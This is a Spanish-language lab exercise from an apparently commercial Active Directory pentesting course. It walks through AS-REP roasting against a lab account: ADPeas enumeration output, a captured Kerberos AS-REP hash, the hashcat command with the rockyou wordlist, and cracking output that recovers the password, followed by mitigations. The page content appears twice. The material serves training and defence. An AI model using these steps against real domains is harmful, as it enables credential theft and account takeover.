ASREProastable

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/ej3kiu. ¡Te esperamos para empezar este viaje juntos!

OBJETIVO DEL EJERCICIO #17:

Teniendo una autenticacion sobre cualquier usuario comprometer al usuario: asrep.userEste ejercicio deberia ser realizado desde el servidor de USER-SERVER. Para realizarlo es suficiente tener encendido UNICAMENTE WEBSERVER y First-DC.

"KRB_AS_REP Roasting" es un método de ataque que los actores malintencionados pueden utilizar para comprometer cuentas de usuario en un entorno que utiliza Kerberos para la autenticación, típicamente un dominio de Active Directory (AD) en Windows. Este ataque se dirige específicamente a cuentas que tienen la propiedad "Do not require Kerberos preauthentication" configurada. Veamos en detalle qué significa esto, cómo funciona el ataque, qué podría lograr un atacante y cómo se puede mitigar.

¿Por qué es una vulnerabilidad?

Preautenticación de Kerberos: Normalmente, Kerberos requiere que un usuario proporcione no solo su nombre de usuario sino también su contraseña para obtener un ticket TGT (Ticket Granting Ticket) durante el proceso de autenticación inicial (AS-REQ). Esta es una medida de seguridad diseñada para prevenir ataques de tipo "offline" en los que se intenta adivinar las contraseñas.
Cuentas sin Preautenticación: Sin embargo, en algunos casos, esta propiedad puede estar deshabilitada para ciertas cuentas debido a necesidades de compatibilidad o configuraciones erróneas. Esto significa que el KDC (Key Distribution Center) enviará la respuesta (AS-REP) que contiene el TGT cifrado sin requerir una prueba válida de conocimiento de la contraseña del usuario.

¿Cómo funciona el ataque?

Enumeración de Usuarios: Un atacante primero enumerará las cuentas de usuario que tienen deshabilitada la preautenticación de Kerberos.
Solicitud de TGT: Luego, el atacante puede enviar una solicitud AS-REQ para esas cuentas y el KDC responderá con un AS-REP que contiene el TGT cifrado usando la contraseña del usuario.
Ataque Offline: A diferencia de un ataque de fuerza bruta online, el atacante puede ahora intentar descifrar el TGT offline, utilizando herramientas de cracking de contraseñas para adivinar la contraseña sin alertar al sistema o bloquear la cuenta de usuario.

¿Qué podría lograr un atacante?

Acceso no Autorizado: Si el atacante descifra con éxito la contraseña, puede autenticarse como el usuario comprometido y acceder a los recursos, realizar movimientos laterales, elevar privilegios, exfiltrar datos, etc.
Persistencia: Los actores malintencionados pueden crear cuentas adicionales o configurar otros métodos de acceso para mantener la persistencia en la red comprometida.
Elevación de Privilegios: Si la cuenta comprometida tiene privilegios elevados, el atacante puede tomar el control total del dominio de Active Directory.

Esta vulnerabilidad fue previamente detectada con el resultado de ADPeas:

[?] +++++ Searching for ASREProastable User +++++
[!] Found ASREProastable User 'asrep.user':
sAMAccountName:                         asrep.user
distinguishedName:                      CN=asrep.user,CN=Users,DC=spartancybersec,DC=corp
objectSid:                              S-1-5-21-1861162130-2580302541-221646211-1128
pwdLastSet:                             09/29/2023 02:03:36
lastLogonTimestamp:                     09/29/2023 02:03:36
[+] userAccountControl:                 NORMAL_ACCOUNT, DONT_REQ_PREAUTH

Hashcat usage: Hashcat -m 18200
$krb5asrep$23$asrep.user@spartancybersec.corp:8995909962b0fd21a925ca8bfbf9c894$61322316eedd52d638ad1dabb7b011559f0dffb36de32b252d24291eb6a9fbe1a237acc2143a8e6f70bb65c3075caf28d22b92b491a87a8bc48d28233c1abc56b07239533fa9571c7c89e599e53a7551b03d8c702cf3759c19f75ea0f24c5cedd669fd57b6422c4b73ea95161b754f408306c479d7844c0a6bc2a9a15249b42ad8acf83f5afcd4d9b892835150a9bd49d377c6d548f9405139492a8bcf7ea740a31b986604cf05f1eb5f16c2d1cb826fd05417ab1550b3d2ce9ae2fce985b6349f62f788418a44c0e058107c4d5433dba37b0038c5b3f61b11bc0e671c2b77e6522cafca0cde6b8730a4808e803de91a78c34adb774100fa1761512e

Para crackear este hash podemos utilizar el siguiente comando:

El resultado de un ataque de fuerza bruta siempre estara condicionado a tener un buen diccionario. Es recomendable generar diccionarios personalizados con patrones comunes como por ejemplo: Sp@rt@n2023

Primero almacenamos todo el hash en un archivo "hash-kerberoasting" y luego ejecutamos hashcat:

kali@kali=> hashcat -m 18200 output.txt /usr/share/wordlists/rockyou.txt

$krb5asrep$23$asrep.user@SPARTANCYBERSEC.CORP:2796da33cca042ae44286003c8321865$3140b07f9670a05a3307cbd1a2af15df4d197d6ee9fb42ab114a15f561a7ed7c96247b590dfa330ab9b796b9ef71e328f1d2f3f39d6059c9a04c38ebb0d08da9d00447a057ed458015b9812b7bf715cce15a62eda76b407b552f6ef6c2ee8940c0c4856dddecb7c0f6259d934864b10869d467197e7c4ae14baec82c527ebf67ab3a56f6e85318df1982ef3e2058ccab7c5b7848860e9a30ececc77e62ae4acc4605d109b3292765dd3136f227e31313b4f7feb511dec64cb62d2bcea183fa79fbd25b3705b6373f72e3cc06e9cccaf06c0128dc824a805555ee478a2284c0edeb8682004ee8ecced9d05b6b2c400bdd4728179bdbcf97dd46be560a:Password@1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$asrep.user@SPARTANCYBERSEC.CORP:2796d...be560a
Time.Started.....: Sun Oct 22 11:38:16 2023 (4 secs)
Time.Estimated...: Sun Oct 22 11:38:20 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   621.9 kH/s (0.38ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2103296/14344385 (14.66%)
Rejected.........: 0/2103296 (0.00%)
Restore.Point....: 2103040/14344385 (14.66%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: PeeKaBoo!NYY -> Passp0rt
Hardware.Mon.#1..: Util:100%

La contraseña para este caso era debil y es: Password@1

Mitigación:

Revisar Configuraciones de Cuenta: Regularmente revise las cuentas en el dominio de AD para asegurarse de que la preautenticación de Kerberos esté habilitada a menos que sea absolutamente necesario.
Uso de Contraseñas Fuertes: Implemente políticas que requieran contraseñas largas y complejas que sean difíciles de adivinar incluso con herramientas de cracking de contraseñas.
Monitoreo y Alertas: Establezca sistemas de monitoreo y alerta para detectar comportamientos anómalos o sospechosos relacionados con la autenticación de Kerberos y las consultas de directorio.
Educación y Conciencia: Eduque a los administradores de sistemas y redes sobre la importancia de la configuración de seguridad correcta de las cuentas y cómo ciertas configuraciones pueden dejar abierta la puerta a ataques.

AnteriorUtilizando PowerView SiguienteUtilizando Rubeus

Última actualización hace 5 meses

¿Por qué es una vulnerabilidad?

Preautenticación de Kerberos: Normalmente, Kerberos requiere que un usuario proporcione no solo su nombre de usuario sino también su contraseña para obtener un ticket TGT (Ticket Granting Ticket) durante el proceso de autenticación inicial (AS-REQ). Esta es una medida de seguridad diseñada para prevenir ataques de tipo "offline" en los que se intenta adivinar las contraseñas.

Cuentas sin Preautenticación: Sin embargo, en algunos casos, esta propiedad puede estar deshabilitada para ciertas cuentas debido a necesidades de compatibilidad o configuraciones erróneas. Esto significa que el KDC (Key Distribution Center) enviará la respuesta (AS-REP) que contiene el TGT cifrado sin requerir una prueba válida de conocimiento de la contraseña del usuario.

¿Cómo funciona el ataque?

Enumeración de Usuarios: Un atacante primero enumerará las cuentas de usuario que tienen deshabilitada la preautenticación de Kerberos.

Solicitud de TGT: Luego, el atacante puede enviar una solicitud AS-REQ para esas cuentas y el KDC responderá con un AS-REP que contiene el TGT cifrado usando la contraseña del usuario.

Ataque Offline: A diferencia de un ataque de fuerza bruta online, el atacante puede ahora intentar descifrar el TGT offline, utilizando herramientas de cracking de contraseñas para adivinar la contraseña sin alertar al sistema o bloquear la cuenta de usuario.

¿Qué podría lograr un atacante?

Acceso no Autorizado: Si el atacante descifra con éxito la contraseña, puede autenticarse como el usuario comprometido y acceder a los recursos, realizar movimientos laterales, elevar privilegios, exfiltrar datos, etc.

Persistencia: Los actores malintencionados pueden crear cuentas adicionales o configurar otros métodos de acceso para mantener la persistencia en la red comprometida.

Elevación de Privilegios: Si la cuenta comprometida tiene privilegios elevados, el atacante puede tomar el control total del dominio de Active Directory.

Esta vulnerabilidad fue previamente detectada con el resultado de ADPeas:

[?] +++++ Searching for ASREProastable User +++++
[!] Found ASREProastable User 'asrep.user':
sAMAccountName:                         asrep.user
distinguishedName:                      CN=asrep.user,CN=Users,DC=spartancybersec,DC=corp
objectSid:                              S-1-5-21-1861162130-2580302541-221646211-1128
pwdLastSet:                             09/29/2023 02:03:36
lastLogonTimestamp:                     09/29/2023 02:03:36
[+] userAccountControl:                 NORMAL_ACCOUNT, DONT_REQ_PREAUTH

Hashcat usage: Hashcat -m 18200
$krb5asrep$23$asrep.user@spartancybersec.corp:8995909962b0fd21a925ca8bfbf9c894$61322316eedd52d638ad1dabb7b011559f0dffb36de32b252d24291eb6a9fbe1a237acc2143a8e6f70bb65c3075caf28d22b92b491a87a8bc48d28233c1abc56b07239533fa9571c7c89e599e53a7551b03d8c702cf3759c19f75ea0f24c5cedd669fd57b6422c4b73ea95161b754f408306c479d7844c0a6bc2a9a15249b42ad8acf83f5afcd4d9b892835150a9bd49d377c6d548f9405139492a8bcf7ea740a31b986604cf05f1eb5f16c2d1cb826fd05417ab1550b3d2ce9ae2fce985b6349f62f788418a44c0e058107c4d5433dba37b0038c5b3f61b11bc0e671c2b77e6522cafca0cde6b8730a4808e803de91a78c34adb774100fa1761512e

Para crackear este hash podemos utilizar el siguiente comando:

Primero almacenamos todo el hash en un archivo "hash-kerberoasting" y luego ejecutamos hashcat:

kali@kali=> hashcat -m 18200 output.txt /usr/share/wordlists/rockyou.txt

$krb5asrep$23$asrep.user@SPARTANCYBERSEC.CORP:2796da33cca042ae44286003c8321865$3140b07f9670a05a3307cbd1a2af15df4d197d6ee9fb42ab114a15f561a7ed7c96247b590dfa330ab9b796b9ef71e328f1d2f3f39d6059c9a04c38ebb0d08da9d00447a057ed458015b9812b7bf715cce15a62eda76b407b552f6ef6c2ee8940c0c4856dddecb7c0f6259d934864b10869d467197e7c4ae14baec82c527ebf67ab3a56f6e85318df1982ef3e2058ccab7c5b7848860e9a30ececc77e62ae4acc4605d109b3292765dd3136f227e31313b4f7feb511dec64cb62d2bcea183fa79fbd25b3705b6373f72e3cc06e9cccaf06c0128dc824a805555ee478a2284c0edeb8682004ee8ecced9d05b6b2c400bdd4728179bdbcf97dd46be560a:Password@1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$asrep.user@SPARTANCYBERSEC.CORP:2796d...be560a
Time.Started.....: Sun Oct 22 11:38:16 2023 (4 secs)
Time.Estimated...: Sun Oct 22 11:38:20 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   621.9 kH/s (0.38ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2103296/14344385 (14.66%)
Rejected.........: 0/2103296 (0.00%)
Restore.Point....: 2103040/14344385 (14.66%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: PeeKaBoo!NYY -> Passp0rt
Hardware.Mon.#1..: Util:100%

La contraseña para este caso era debil y es: Password@1

Mitigación:

Revisar Configuraciones de Cuenta: Regularmente revise las cuentas en el dominio de AD para asegurarse de que la preautenticación de Kerberos esté habilitada a menos que sea absolutamente necesario.

Uso de Contraseñas Fuertes: Implemente políticas que requieran contraseñas largas y complejas que sean difíciles de adivinar incluso con herramientas de cracking de contraseñas.

Monitoreo y Alertas: Establezca sistemas de monitoreo y alerta para detectar comportamientos anómalos o sospechosos relacionados con la autenticación de Kerberos y las consultas de directorio.

Educación y Conciencia: Eduque a los administradores de sistemas y redes sobre la importancia de la configuración de seguridad correcta de las cuentas y cómo ciertas configuraciones pueden dejar abierta la puerta a ataques.